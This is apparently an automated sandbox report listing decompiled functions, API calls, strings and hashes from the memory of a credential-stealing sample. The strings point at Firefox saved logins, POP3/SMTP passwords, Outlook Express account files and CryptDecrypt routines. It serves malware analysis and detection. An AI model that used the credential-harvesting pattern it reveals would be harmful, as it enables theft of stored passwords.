                                                                                                                                                                                                                                    • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                                    • String ID: Arial
                                                                                                                                                                                                                                    • API String ID: 3853255127-493054409
                                                                                                                                                                                                                                    • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                                                                    • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                                                                    • API String ID: 520177685-3817206916
                                                                                                                                                                                                                                    • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                                                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 145871493-0
                                                                                                                                                                                                                                    • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                                                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                                                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                                                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                                                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4165544737-0
                                                                                                                                                                                                                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                                                                    • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                                    • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                                                                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                                                                    • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                                    • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                                                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 2238633743-192783356
                                                                                                                                                                                                                                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                                                                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                                                    • API String ID: 3963849919-1658304561
                                                                                                                                                                                                                                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                    • String ID: (yE$(yE$(yE
                                                                                                                                                                                                                                    • API String ID: 1865533344-362086290
                                                                                                                                                                                                                                    • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                                                                                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000004.00000002.29881343409.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                                    • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                                    • API String ID: 3137614212-1455797042
                                                                                                                                                                                                                                    • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                                                                                    • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                                                                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                                                                                                                                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
